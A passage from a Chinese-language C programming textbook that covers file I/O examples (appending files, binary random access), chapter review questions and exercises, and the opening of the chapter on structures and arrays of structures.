两种情况。当上一次输入调用检测到文件结尾时,feof()函数返回一个非零 值,否则返回0。当读或写出现错误,ferror()函数返回一个非零值,否则返 回0。 13.7.8 一个程序示例 接下来,我们用一个程序示例说明这些函数的用法。该程序把一系列文 件中的内容附加在另一个文件的末尾。该程序存在一个问题:如何给文件传 递信息。可以通过交互或使用命令行参数来完成,我们先采用交互式的方 法。下面列出了程序的设计方案。 询问目标文件的名称并打开它。 使用一个循环询问源文件。 以读模式依次打开每个源文件,并将其添加到目标文件的末尾。 为演示setvbuf()函数的用法,该程序将使用它指定一个不同的缓冲区大 小。下一步是细化程序打开目标文件的步骤: 1.以附加模式打开目标文件; 2.如果打开失败,则退出程序; 3.为该文件创建一个4096字节的缓冲区; 4.如果创建失败,则退出程序。 与此类似,通过以下具体步骤细化拷贝部分: 1.如果该文件与目标文件相同,则跳至下一个文件; 2.如果以读模式无法打开文件,则跳至下一个文件; 3.把文件内容添加至目标文件末尾。 985 最后,程序回到目标文件的开始处,显示当前整个文件的内容。 作为练习,我们使用fread()和fwrite()函数进行拷贝。程序清单13.5给出 了这个程序。 程序清单13.5 append.c程序 /* append.c -- 把文件附加到另一个文件末尾 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define BUFSIZE 4096 #define SLEN 81 void append(FILE *source, FILE *dest); char * s_gets(char * st, int n); int main(void) { FILE *fa, *fs;  // fa 指向目标文件,fs 指向源文件 int files = 0;     // 附加的文件数量 char file_app[SLEN];  // 目标文件名 char file_src[SLEN];  // 源文件名 int ch; 986 puts("Enter name of destination file:"); s_gets(file_app, SLEN); if ((fa = fopen(file_app, "a+")) == NULL) { fprintf(stderr, "Can't open %s\n", file_app); exit(EXIT_FAILURE); } if (setvbuf(fa, NULL, _IOFBF, BUFSIZE) != 0) { fputs("Can't create output buffer\n", stderr); exit(EXIT_FAILURE); } puts("Enter name of first source file (empty line to quit):"); while (s_gets(file_src, SLEN) && file_src[0] != '\0') { if (strcmp(file_src, file_app) == 0) fputs("Can't append file to itself\n", stderr); else if ((fs = fopen(file_src, "r")) == NULL) fprintf(stderr, "Can't open %s\n", file_src); 987 else { if (setvbuf(fs, NULL, _IOFBF, BUFSIZE) != 0) { fputs("Can't create input buffer\n", stderr); continue; } append(fs, fa); if (ferror(fs) != 0) fprintf(stderr, "Error in reading file %s.\n", file_src); if (ferror(fa) != 0) fprintf(stderr, "Error in writing file %s.\n", file_app); fclose(fs); files++; printf("File %s appended.\n", file_src); puts("Next file (empty line to quit):"); } 988 } printf("Done appending.%d files appended.\n", files); rewind(fa); printf("%s contents:\n", file_app); while ((ch = getc(fa)) != EOF) putchar(ch); puts("Done displaying."); fclose(fa); return 0; } void append(FILE *source, FILE *dest) { size_t bytes; static char temp[BUFSIZE]; // 只分配一次 while ((bytes = fread(temp, sizeof(char), BUFSIZE, source)) > 0) fwrite(temp, sizeof(char), bytes, dest); } char * s_gets(char * st, int n) { 989 char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue; } return ret_val; } 如果setvbuf()无法创建缓冲区,则返回一个非零值,然后终止程序。可 以用类似的代码为正在拷贝的文件创建一块4096字节的缓冲区。把NULL作 为setvbuf()的第2个参数,便可让函数分配缓冲区的存储空间。 该程序获取文件名所用的函数是 s_gets(),而不是 scanf(),因为 scanf() 会跳过空白,因此无法检测到空行。该程序还用s_gets()代替fgets(),因为后 者在字符串中保留换行符。 990 以下代码防止程序把文件附加在自身末尾: if (strcmp(file_src, file_app) == 0) fputs("Can't append file to itself\n",stderr); 参数file_app表示目标文件名,file_src表示正在处理的文件名。 append()函数完成拷贝任务。该函数使用fread()和fwrite()一次拷贝4096 字节,而不是一次拷贝1字节: void append(FILE *source, FILE *dest) { size_t bytes; static char temp[BUFSIZE]; // 只分配一次 while ((bytes = fread(temp, sizeof(char), BUFSIZE, source)) > 0) fwrite(temp, sizeof(char), bytes, dest); } 因为是以附加模式打开由 dest 指定的文件,所以所有的源文件都被依 次添加至目标文件的末尾。注意,temp数组具有静态存储期(意思是在编译 时分配该数组,不是在每次调用append()函数时分配)和块作用域(意思是 该数组属于它所在的函数私有)。 该程序示例使用文本模式的文件。使用"ab+"和"rb"模式可以处理二进制 文件。 13.7.9 用二进制I/O进行随机访问 随机访问是用二进制I/O写入二进制文件最常用的方式,我们来看一个 991 简短的例子。程序清单13.6中的程序创建了一个储存double类型数字的文 件,然后让用户访问这些内容。 程序清单13.6 randbin.c程序 /* randbin.c -- 用二进制I/O进行随机访问 */ #include <stdio.h> #include <stdlib.h> #define ARSIZE 1000 int main() { double numbers[ARSIZE]; double value; const char * file = "numbers.dat"; int i; long pos; FILE *iofile; // 创建一组 double类型的值 for (i = 0; i < ARSIZE; i++) numbers[i] = 100.0 * i + 1.0 / (i + 1); // 尝试打开文件 992 if ((iofile = fopen(file, "wb")) == NULL) { fprintf(stderr, "Could not open %s for output.\n", file); exit(EXIT_FAILURE); } // 以二进制格式把数组写入文件 fwrite(numbers, sizeof(double), ARSIZE, iofile); fclose(iofile); if ((iofile = fopen(file, "rb")) == NULL) { fprintf(stderr, "Could not open %s for random access.\n", file); exit(EXIT_FAILURE); } // 从文件中读取选定的内容 printf("Enter an index in the range 0-%d.\n", ARSIZE - 1); while (scanf("%d", &i) == 1 && i >= 0 && i < ARSIZE) { pos = (long) i * sizeof(double);  // 计算偏移量 993 fseek(iofile, pos, SEEK_SET);    // 定位到此处 fread(&value, sizeof(double), 1, iofile); printf("The value there is %f.\n", value); printf("Next index (out of range to quit):\n"); } // 完成 fclose(iofile); puts("Bye!"); return 0; } 首先,该程序创建了一个数组,并在该数组中存放了一些值。然后,程 序以二进制模式创建了一个名为numbers.dat的文件,并使用fwrite()把数组中 的内容拷贝到文件中。内存中数组的所有double类型值的位组合(每个位组 合都是64位)都被拷贝至文件中。不能用文本编辑器读取最后的二进制文 件,因为无法把文件中的值转换成字符串。然而,储存在文件中的每个值都 与储存在内存中的值完全相同,没有损失任何精确度。此外,每个值在文件 中也同样占用64位存储空间,所以可以很容易地计算出每个值的位置。 程序的第 2 部分用于打开待读取的文件,提示用户输入一个值的索引。 程序通过把索引值和 double类型值占用的字节相乘,即可得出文件中的一个 位置。然后,程序调用fseek()定位到该位置,用fread()读取该位置上的数据 值。注意,这里并未使用转换说明。fread()从已定位的位置开始,拷贝8字 节到内存中地址为&value的位置。然后,使用printf()显示value。下面是该程 序的一个运行示例: 994 Enter an index in the range 0-999. 500 The value there is 50000.001996. Next index (out of range to quit): 900 The value there is 90000.001110. Next index (out of range to quit): 0 The value there is 1.000000. Next index (out of range to quit): -1 Bye! 995 13.8 关键概念 C程序把输入看作是字节流,输入流来源于文件、输入设备(如键 盘),或者甚至是另一个程序的输出。类似地,C程序把输出也看作是字节 流,输出流的目的地可以是文件、视频显示等。 C 如何解释输入流或输出流取决于所使用的输入/输出函数。程序可以 不做任何改动地读取和存储字节,或者把字节依次解释成字符,随后可以把 这些字符解释成普通文本以用文本表示数字。类似地,对于输出,所使用的 函数决定了二进制值是被原样转移,还是被转换成文本或以文本表示数字。 如果要在不损失精度的前提下保存或恢复数值数据,请使用二进制模式以及 fread()和fwrite()函数。如果打算保存文本信息并创建能在普通文本编辑器查 看的文本,请使用文本模式和函数(如getc()和fprintf())。 要访问文件,必须创建文件指针(类型是FILE *)并把指针与特定文件 名相关联。随后的代码就可以使用这个指针(而不是文件名)来处理该文 件。 要重点理解C如何处理文件结尾。通常,用于读取文件的程序使用一个 循环读取输入,直至到达文件结尾。C 输入函数在读过文件结尾后才会检测 到文件结尾,这意味着应该在尝试读取之后立即判断是否是文件结尾。可以 使用13.2.4节中“设计范例”中的双文件输入模式。 996 13.9 本章小结 对于大多数C程序而言,写入文件和读取文件必不可少。为此,绝大对 数C实现都提供底层I/O和标准高级I/O。因为ANSI C库考虑到可移植性,包 含了标准I/O包,但是未提供底层I/O。 标准 I/O 包自动创建输入和输出缓冲区以加快数据传输。fopen()函数为 标准 I/O 打开一个文件,并创建一个用于存储文件和缓冲区信息的结构。 fopen()函数返回指向该结构的指针,其他函数可以使用该指针指定待处理的 文件。feof()和ferror()函数报告I/O操作失败的原因。 C把输入视为字节流。如果使用fread()函数,C把输入看作是二进制值 并将其储存在指定存储位置。如果使用fscanf()、getc()、fgets()或其他相关函 数,C则将每个字节看作是字符码。然后fscanf()和scanf()函数尝试把字符码 翻译成转换说明指定的其他类型。例如,输入一个值23,%f转换说明会把 23翻译成一个浮点值,%d转换说明会把23翻译成一个整数值,%s转换说明 则会把23储存为字符串。getc()和 fgetc()系列函数把输入作为字符码储存, 将其作为单独的字符保存在字符变量中或作为字符串储存在字符数组中。类 似地,fwrite()将二进制数据直接放入输出流,而其他输出函数把非字符数 据转换成用字符表示后才将其放入输出流。 ANSI C提供两种文件打开模式:二进制和文本。以二进制模式打开文 件时,可以逐字节读取文件;以文本模式打开文件时,会把文件内容从文本 的系统表示法映射为C表示法。对于UNIX和Linux系统,这两种模式完全相 同。 通常,输入函数getc()、fgets()、fscanf()和fread()都从文件开始处按顺序 读取文件。然而, fseek()和ftell()函数让程序可以随机访问文件中的任意位 置。fgetpos()和fsetpos()把类似的功能扩展至更大的文件。与文本模式相 比,二进制模式更容易进行随机访问。 997 13.10 复习题 复习题的参考答案在附录A中。 1.下面的程序有什么问题? int main(void) { int * fp; int k; fp = fopen("gelatin"); for (k = 0; k < 30; k++) fputs(fp, "Nanette eats gelatin."); fclose("gelatin"); return 0; } 2.下面的程序完成什么任务?(假设在命令行环境中运行) #include <stdio.h> #include <stdlib.h> #include <ctype.h> int main(int argc, char *argv []) { 998 int ch; FILE *fp; if (argc < 2) exit(EXIT_FAILURE); if ((fp = fopen(argv[1], "r")) == NULL) exit(EXIT_FAILURE); while ((ch = getc(fp)) != EOF) if (isdigit(ch)) putchar(ch); fclose(fp); return 0; } 3.假设程序中有下列语句: #include <stdio.h> FILE * fp1,* fp2; char ch; fp1 = fopen("terky", "r"); fp2 = fopen("jerky", "w"); 另外,假设成功打开了两个文件。补全下面函数调用中缺少的参数: 999 a.ch = getc(); b.fprintf( ,"%c\n", ); c.putc( , ); d.fclose(); /* 关闭terky文件 */ 4.编写一个程序,不接受任何命令行参数或接受一个命令行参数。如果 有一个参数,将其解释为文件名;如果没有参数,使用标准输入(stdin)作 为输入。假设输入完全是浮点数。该程序要计算和报告输入数字的算术平均 值。 5.编写一个程序,接受两个命令行参数。第1个参数是字符,第2个参数 是文件名。要求该程序只打印文件中包含给定字符的那些行。 注意 C程序根据'\n'识别文件中的行。假设所有行都不超过256个字符,你可 能会想到用fgets()。 6.二进制文件和文本文件有何区别?二进制流和文本流有何区别? 7. a.分别用fprintf()和fwrite()储存8238201有何区别? b.分别用putc()和fwrite()储存字符S有何区别? 8.下面语句的区别是什么? printf("Hello, %s\n", name); fprintf(stdout, "Hello, %s\n", name); fprintf(stderr, "Hello, %s\n", name); 1000 9."a+"、"r+"和"w+"模式打开的文件都是可读写的。哪种模式更适合用 来更改文件中已有的内容? 1001 13.11 编程练习 1.修改程序清单13.1中的程序,要求提示用户输入文件名,并读取用户 输入的信息,不使用命令行参数。 2.编写一个文件拷贝程序,该程序通过命令行获取原始文件名和拷贝文 件名。尽量使用标准I/O和二进制模式。 3.编写一个文件拷贝程序,提示用户输入文本文件名,并以该文件名作 为原始文件名和输出文件名。该程序要使用 ctype.h 中的 toupper()函数,在 写入到输出文件时把所有文本转换成大写。使用标准I/O和文本模式。 4.编写一个程序,按顺序在屏幕上显示命令行中列出的所有文件。使用 argc控制循环。 5.修改程序清单13.5中的程序,用命令行界面代替交互式界面。 6.使用命令行参数的程序依赖于用户的内存如何正确地使用它们。重写 程序清单 13.2 中的程序,不使用命令行参数,而是提示用户输入所需信 息。 7.编写一个程序打开两个文件。可以使用命令行参数或提示用户输入文 件名。 a.该程序以这样的顺序打印:打印第1个文件的第1行,第2个文件的第1 行,第1个文件的第2行,第2个文件的第2行,以此类推,打印到行数较多文 件的最后一行。 b.修改该程序,把行号相同的行打印成一行。 8.编写一个程序,以一个字符和任意文件名作为命令行参数。如果字符 后面没有参数,该程序读取标准输入;否则,程序依次打开每个文件并报告 每个文件中该字符出现的次数。文件名和字符本身也要一同报告。程序应包 含错误检查,以确定参数数量是否正确和是否能打开文件。如果无法打开文 1002 件,程序应报告这一情况,然后继续处理下一个文件。 9.修改程序清单 13.3 中的程序,从 1 开始,根据加入列表的顺序为每个 单词编号。当程序下次运行时,确保新的单词编号接着上次的编号开始。 10.编写一个程序打开一个文本文件,通过交互方式获得文件名。通过 一个循环,提示用户输入一个文件位置。然后该程序打印从该位置开始到下 一个换行符之前的内容。用户输入负数或非数值字符可以结束输入循环。 11.编写一个程序,接受两个命令行参数。第1个参数是一个字符串,第 2个参数是一个文件名。然后该程序查找该文件,打印文件中包含该字符串 的所有行。因为该任务是面向行而不是面向字符的,所以要使用fgets()而不 是getc()。使用标准C库函数strstr()(11.5.7节简要介绍过)在每一行中查找 指定字符串。假设文件中的所有行都不超过255个字符。 12.创建一个文本文件,内含20行,每行30个整数。这些整数都在0~9 之间,用空格分开。该文件是用数字表示一张图片,0~9表示逐渐增加的灰 度。编写一个程序,把文件中的内容读入一个20×30的int数组中。一种把这 些数字转换为图片的粗略方法是:该程序使用数组中的值初始化一个20×31 的字符数组,用值0 对应空格字符,1 对应点字符,以此类推。数字越大表 示字符所占的空间越大。例如,用#表示9。每行的最后一个字符(第31个) 是空字符,这样该数组包含了20个字符串。最后,程序显示最终的图片 (即,打印所有的字符串),并将结果储存在文本文件中。例如,下面是开 始的数据: 0 0 9 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 9 0 0 0 0 0 0 0 5 8 9 9 8 5 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 1 9 8 5 4 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 9 0 0 0 0 0 0 0 5 8 9 9 8 5 0 4 5 2 0 0 0 0 0 0 0 0 0 0 9 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 4 5 2 0 0 0 0 0 0 0 1003 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 1 8 5 0 0 0 4 5 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 4 5 2 0 0 0 0 0 5 5 5 5 5 5 5 5 5 5 5 5 5 8 9 9 8 5 5 5 5 5 5 5 5 5 5 5 5 5 8 8 8 8 8 8 8 8 8 8 8 8 5 8 9 9 8 5 8 8 8 8 8 8 8 8 8 8 8 8 9 9 9 9 0 9 9 9 9 9 9 9 9 9 9 9 9 9 9 9 9 9 3 9 9 9 9 9 9 9 8 8 8 8 8 8 8 8 8 8 8 8 5 8 9 9 8 5 8 8 8 8 8 8 8 8 8 8 8 8 5 5 5 5 5 5 5 5 5 5 5 5 5 8 9 9 8 5 5 5 5 5 5 5 5 5 5 5 5 5 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 6 6 0 0 0 0 0 0 0 0 0 0 2 2 0 0 0 0 0 0 5 8 9 9 8 5 0 0 5 6 0 0 6 5 0 0 0 0 0 0 0 0 3 3 0 0 0 0 0 0 5 8 9 9 8 5 0 5 6 1 1 1 1 6 5 0 0 0 0 0 0 0 4 4 0 0 0 0 0 0 5 8 9 9 8 5 0 0 5 6 0 0 6 5 0 0 0 0 0 0 0 0 5 5 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 6 6 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 5 8 9 9 8 5 0 0 0 0 0 0 0 0 0 0 0 0 根据以上描述选择特定的输出字符,最终输出如下: 1004 13.用变长数组(VLA)代替标准数组,完成编程练习12。 14.数字图像,尤其是从宇宙飞船发回的数字图像,可能会包含一些失 真。为编程练习12添加消除失真的函数。该函数把每个值与它上下左右相邻 的值作比较,如果该值与其周围相邻值的差都大于1,则用所有相邻值的平 均值(四舍五入为整数)代替该值。注意,与边界上的点相邻的点少于4 个,所以做特殊处理。 [1].注意,字符串大小和字符串长度不同。前者指该字符串占用多少空间, 后者指该字符串的字符个数。——译者注 1005 第14章 结构和其他数据形式 本章介绍以下内容: 关键字:struct、union、typedef 运算符:.、-> 什么是C结构,如何创建结构模板和结构变量 如何访问结构的成员,如何编写处理结构的函数 联合和指向函数的指针 设计程序时,最重要的步骤之一是选择表示数据的方法。在许多情况 下,简单变量甚至是数组还不够。为此,C提供了结构变量(structure variable)提高你表示数据的能力,它能让你创造新的形式。如果熟悉Pascal 的记录(record),应该很容易理解结构。如果不懂Pascal也没关系,本章 将详细介绍C结构。我们先通过一个示例来分析为何需要C结构,学习如何 创建和使用结构。 1006 14.1 示例问题:创建图书目录 Gwen Glenn要打印一份图书目录。她想打印每本书的各种信息:书名、 作者、出版社、版权日期、页数、册数和价格。其中的一些项目(如,书 名)可以储存在字符数组中,其他项目需要一个int数组或float数组。用 7 个 不同的数组分别记录每一项比较繁琐,尤其是 Gwen 还想创建多份列表:一 份按书名排序、一份按作者排序、一份按价格排序等。如果能把图书目录的 信息都包含在一个数组里更好,其中每个元素包含一本书的相关信息。 因此,Gwen需要一种即能包含字符串又能包含数字的数据形式,而且 还要保持各信息的独立。C结构就满足这种情况下的需求。我们通过一个示 例演示如何创建和使用数组。但是,示例进行了一些限制。第一,该程序示 例演示的书目只包含书名、作者和价格。第二,只有一本书的数目。当然, 别忘了这只是进行了限制,我们在后面将扩展该程序。请看程序清单14.1及 其输出,然后阅读后面的一些要点。 程序清单14.1 book.c程序 //* book.c -- 一本书的图书目录 */ #include <stdio.h> #include <string.h> char * s_gets(char * st, int n); #define MAXTITL 41  /* 书名的最大长度 + 1  */ #define MAXAUTL 31  /* 作者姓名的最大长度 + 1*/ struct book {    /* 结构模版:标记是 book */ char title[MAXTITL]; 1007 char author[MAXAUTL]; float value; };         /* 结构模版结束    */ int main(void) { struct book library; /* 把 library 声明为一个 book 类型的变量 */ printf("Please enter the book title.\n"); s_gets(library.title, MAXTITL);  /* 访问title部分*/ printf("Now enter the author.\n"); s_gets(library.author, MAXAUTL); printf("Now enter the value.\n"); scanf("%f", &library.value); printf("%s by %s: $%.2f\n", library.title, library.author, library.value); printf("%s: \"%s\" ($%.2f)\n", library.author, library.title, library.value); printf("Done.\n"); return 0; } 1008 char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     //处理输入行中剩余的字符 } return ret_val; } 我们使用前面章节中介绍的s_gets()函数去掉fgets()储存在字符串中的换 行符。下面是该例的一个运行示例: Please enter the book title. 1009 Chicken of the Andes Now enter the author. Disma Lapoult Now enter the value. 29.99 Chicken of the Andes by Disma Lapoult: $29.99 Disma Lapoult: "Chicken of the Andes" ($29.99) Done. 程序清单14.1中创建的结构有3部分,每个部分都称为成员(member) 或字段(field)。这3部分中,一部分储存书名,一部分储存作者名,一部 分储存价格。下面是必须掌握的3个技巧: 为结构建立一个格式或样式; 声明一个适合该样式的变量; 访问结构变量的各个部分。 1010 14.2 建立结构声明 结构声明(structure declaration)描述了一个结构的组织布局。声明类 似下面这样: struct book { char title[MAXTITL]; char author[MAXAUTL]; float value; }; 该声明描述了一个由两个字符数组和一个float类型变量组成的结构。该 声明并未创建实际的数据对象,只描述了该对象由什么组成。〔有时,我们 把结构声明称为模板,因为它勾勒出结构是如何储存数据的。如果读者知道 C++的模板,此模板非彼模板,C++中的模板更为强大。〕我们来分析一些 细节。首先是关键字 struct,它表明跟在其后的是一个结构,后面是一个可 选的标记(该例中是 book),稍后程序中可以使用该标记引用该结构。所 以,我们在后面的程序中可以这样声明: struct book library; 这把library声明为一个使用book结构布局的结构变量。 在结构声明中,用一对花括号括起来的是结构成员列表。每个成员都用 自己的声明来描述。例如,title部分是一个内含MAXTITL个元素的char类型 数组。成员可以是任意一种C的数据类型,甚至可以是其他结构!右花括号 后面的分号是声明所必需的,表示结构布局定义结束。可以把这个声明放在 所有函数的外部(如本例所示),也可以放在一个函数定义的内部。如果把 结构声明置于一个函数的内部,它的标记就只限于该函数内部使用。如果把 结构声明置于函数的外部,那么该声明之后的所有函数都能使用它的标记。 1011 例如,在程序的另一个函数中,可以这样声明: struct book dickens; 这样,该函数便创建了一个结构变量dickens,该变量的结构布局是 book。 结构的标记名是可选的。但是以程序示例中的方式建立结构时(在一处 定义结构布局,在另一处定义实际的结构变量),必须使用标记。我们学完 如何定义结构变量后,再来看这一点。 1012 14.3 定义结构变量 结构有两层含义。一层含义是“结构布局”,刚才已经讨论过了。结构布 局告诉编译器如何表示数据,但是它并未让编译器为数据分配空间。下一步 是创建一个结构变量,即是结构的另一层含义。程序中创建结构变量的一行 是: struct book library; 编译器执行这行代码便创建了一个结构变量library。编译器使用book模 板为该变量分配空间:一个内含MAXTITL个元素的char数组、一个内含 MAXAUTL个元素的char数组和一个float类型的变量。这些存储空间都与一 个名称library结合在一起(见图14.1)。 在结构变量的声明中,struct book所起的作用相当于一般声明中的int或 float。例如,可以定义两个struct book类型的变量,或者甚至是指向struct book类型结构的指针: struct book doyle, panshin, * ptbook; 图14.1 一个结构的内存分配 结构变量doyle和panshin中都包含title、author和value部分。指针ptbook 1013 可以指向doyle、panshin或任何其他book类型的结构变量。从本质上看, book结构声明创建了一个名为struct book的新类型。 就计算机而言,下面的声明: struct book library; 是以下声明的简化: struct book { char title[MAXTITL]; char author[AXAUTL]; float value; } library;  /* 声明的右右花括号后跟变量名*/ 换言之,声明结构的过程和定义结构变量的过程可以组合成一个步骤。 如下所示,组合后的结构声明和结构变量定义不需要使用结构标记: struct { /* 无结构标记 */ char title[MAXTITL]; char author[MAXAUTL]; float value; } library; 然而,如果打算多次使用结构模板,就要使用带标记的形式;或者,使 用本章后面介绍的typedef。 这是定义结构变量的一个方面,在这个例子中,并未初始化结构变量。 1014 14.3.1 初始化结构 初始化变量和数组如下: int count = 0; int fibo[7] = {0,1,1,2,3,5,8}; 结构变量是否也可以这样初始化?是的,可以。初始化一个结构变量 (ANSI之前,不能用自动变量初始化结构;ANSI之后可以用任意存储类 别)与初始化数组的语法类似: struct book library = { "The Pious Pirate and the Devious Damsel", "Renee Vivotte", 1.95 }; 简而言之,我们使用在一对花括号中括起来的初始化列表进行初始化, 各初始化项用逗号分隔。因此, title成员可以被初始化为一个字符串,value 成员可以被初始化为一个数字。为了让初始化项与结构中各成员的关联更加 明显,我们让每个成员的初始化项独占一行。这样做只是为了提高代码的可 读性,对编译器而言,只需要用逗号分隔各成员的初始化项即可。 注意 初始化结构和类别储存期 第12章中提到过,如果初始化静态存储期的变量(如,静态外部链接、 静态内部链接或静态无链接),必须使用常量值。这同样适用于结构。如果 初始化一个静态存储期的结构,初始化列表中的值必须是常量表达式。如果 是自动存储期,初始化列表中的值可以不是常量。 1015 14.3.2 访问结构成员 结构类似于一个“超级数组”,这个超级数组中,可以是一个元素为char 类型,下一个元素为forat类型,下一个元素为int数组。可以通过数组下标单 独访问数组中的各元素,那么,如何访问结构中的成员?使用结构成员运算 符——点(.)访问结构中的成员。例如,library.value即访问library的value 部分。可以像使用任何float类型变量那样使用library.value。与此类似,可以 像使用字符数组那样使用 library.title。因此,程序清单 14.1 中的程序中有 s_gets(library.title, MAXTITL);和scanf("%f", &library.value);这样的代码。 本质上,.title、.author和.value的作用相当于book结构的下标。 注意,虽然library是一个结构,但是library.value是一个float类型的变 量,可以像使用其他 float 类型变量那样使用它。例如,scanf("%f",...)需要一 个 float 类型变量的地址,而&library.float正好符合要求。.比&的优先级高, 因此这个表达式和&(library.float)一样。 如果还有一个相同类型的结构变量,可以用相同的方法: struct book bill, newt; s_gets(bill.title, MAXTITL); s_gets(newt.title, MAXTITL); .title 引用 book 结构的第 1 个成员。注意,程序清单 14.1 中的程序以两 种不同的格式打印了library结构变量中的内容。这说明可以自行决定如何使 用结构成员。 14.3.3 结构的初始化器 C99和C11为结构提供了指定初始化器(designated initializer)[1],其语 法与数组的指定初始化器类似。但是,结构的指定初始化器使用点运算符和 成员名(而不是方括号和下标)标识特定的元素。例如,只初始化book结构 1016 的value成员,可以这样做: struct book surprise = { .value = 10.99}; 可以按照任意顺序使用指定初始化器: struct book gift = { .value = 25.99, .author = "James Broadfool", .title = "Rue for the Toad"}; 与数组类似,在指定初始化器后面的普通初始化器,为指定成员后面的 成员提供初始值。另外,对特定成员的最后一次赋值才是它实际获得的值。 例如,考虑下面的代码: struct book gift= {.value = 18.90, .author = "Philionna Pestle", 0.25}; 赋给value的值是0.25,因为它在结构声明中紧跟在author成员之后。新 值0.25取代了之前的18.9。在学习了结构的基本知识后,可以进一步了解结 构的一些相关类型。 1017 14.4 结构数组 接下来,我们要把程序清单14.1的程序扩展成可以处理多本书。显然, 每本书的基本信息都可以用一个 book 类型的结构变量来表示。为描述两本 书,需要使用两个变量,以此类推。可以使用这一类型的结构数组来处理多 本书。在下一个程序中(程序清单 14.2)就创建了一个这样的数组。如果你 使用 Borland C/C++,请参阅本节后面的“Borland C和浮点数”。 结构和内存 manybook.c程序创建了一个内含100个结构变量的数组。由于该数组是 自动存储类别的对象,其中的信息被储存在栈(stack)中。如此大的数组需 要很大一块内存,这可能会导致一些问题。如果在运行时出现错误,可能抱 怨栈大小或栈溢出,你的编译器可能使用了一个默认大小的栈,这个栈对于 该例而言太小。要修正这个问题,可以使用编译器选项设置栈大小为 10000,以容纳这个结构数组;或者可以创建静态或外部数组(这样,编译 器就不会把数组放在栈中);或者可以减小数组大小为16。为何不一开始就 使用较小的数组?这是为了让读者意识到栈大小的潜在问题,以便今后再遇 到类似的问题,可以自己处理好。 程序清单14.2 manybook.c程序 /* manybook.c -- 包含多本书的图书目录 */ #include <stdio.h> #include <string.h> char * s_gets(char * st, int n); #define MAXTITL  40 #define MAXAUTL  40 1018 #define MAXBKS 100    /* 书籍的最大数量 */ struct book {      /* 简历 book 模板  */ char title[MAXTITL]; char author[MAXAUTL]; float value; }; int main(void) { struct book library[MAXBKS];  /* book 类型结构的数组 */ int count = 0; int index; printf("Please enter the book title.\n"); printf("Press [enter] at the start of a line to stop.\n"); while (count < MAXBKS && s_gets(library[count].title, MAXTITL) != NULL && library[count].title[0] != '\0') { printf("Now enter the author.\n"); s_gets(library[count].author, MAXAUTL); 1019 printf("Now enter the value.\n"); scanf("%f", &library[count++].value); while (getchar() != '\n') continue;   /* 清理输入行*/ if (count < MAXBKS) printf("Enter the next title.\n"); } if (count > 0) { printf("Here is the list of your books:\n"); for (index = 0; index < count; index++) printf("%s by %s: $%.2f\n", library[index].title, library[index].author, library[index].value); } else printf("No books? Too bad.\n"); return 0; } char * s_gets(char * st, int n) 1020 { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行中剩余的字符 } return ret_val; } 下面是该程序的一个输出示例: Please enter the book title. Press [enter] at the start of a line to stop. My Life as a Budgie 1021 Now enter the author. Mack Zackles Now enter the value. 12.95 Enter the next title. ...(此处省略了许多内容)... Here is the list of your books: My Life as a Budgie by Mack Zackles: $12.95 Thought and Unthought Rethought by Kindra Schlagmeyer: $43.50 Concerto for Financial Instruments by Filmore Walletz: $49.99 The CEO Power Diet by Buster Downsize: $19.25 C++ Primer Plus by Stephen Prata: $59.99 Fact Avoidance: Perception as Reality by Polly Bull: $19.97 Coping with Coping by Dr.Rubin Thonkwacker: $0.02 Diaphanous Frivolity by Neda McFey: $29.99 Murder Wore a Bikini by Mickey Splats: $18.95 A History of Buvania, Volume 8, by Prince Nikoli Buvan: $50.04 Mastering Your Digital Watch, 5nd Edition, by Miklos Mysz: $28.95 A Foregone Confusion by Phalty Reasoner: $5.99 1022 Outsourcing Government: Selection vs.Election by Ima Pundit: $33.33 Borland C和浮点数 如果程序不使用浮点数,旧式的Borland C编译器会尝试使用小版本的 scanf()来压缩程序。然而,如果在一个结构数组中只有一个浮点值(如程序 清单14.2中那样),那么这种编译器(DOS的Borland C/C++ 3.1之前的版 本,不是Borland C/C++ 4.0)就无法发现它存在。结果,编译器会生成如下 消息: scanf : floating point formats not linked Abnormal program termination 一种解决方案是,在程序中添加下面的代码: #include <math.h> double dummy = sin(0.0); 这段代码强制编译器载入浮点版本的scanf()。 首先,我们学习如何声明结构数组和如何访问数组中的结构成员。然 后,着重分析该程序的两个方面。 14.4.1 声明结构数组 声明结构数组和声明其他类型的数组类似。下面是一个声明结构数组的 例子: struct book library[MAXBKS]; 以上代码把library声明为一个内含MAXBKS个元素的数组。数组的每个 元素都是一个book类型的数组。因此,library[0]是第1个book类型的结构变 量,library[1]是第2个book类型的结构变量,以此类推。参看图14.2 可以帮 1023 助读者理解。数组名library本身不是结构名,它是一个数组名,该数组中的 每个元素都是struct book类型的结构变量。 图14.2 一个结构数组library[MAXBKS] 14.4.2 标识结构数组的成员 为了标识结构数组中的成员,可以采用访问单独结构的规则:在结构名 后面加一个点运算符,再在点运算符后面写上成员名。如下所示: library[0].value /* 第1个数组元素与value 相关联 */ library[4].title /* 第5个数组元素与title 相关联 */ 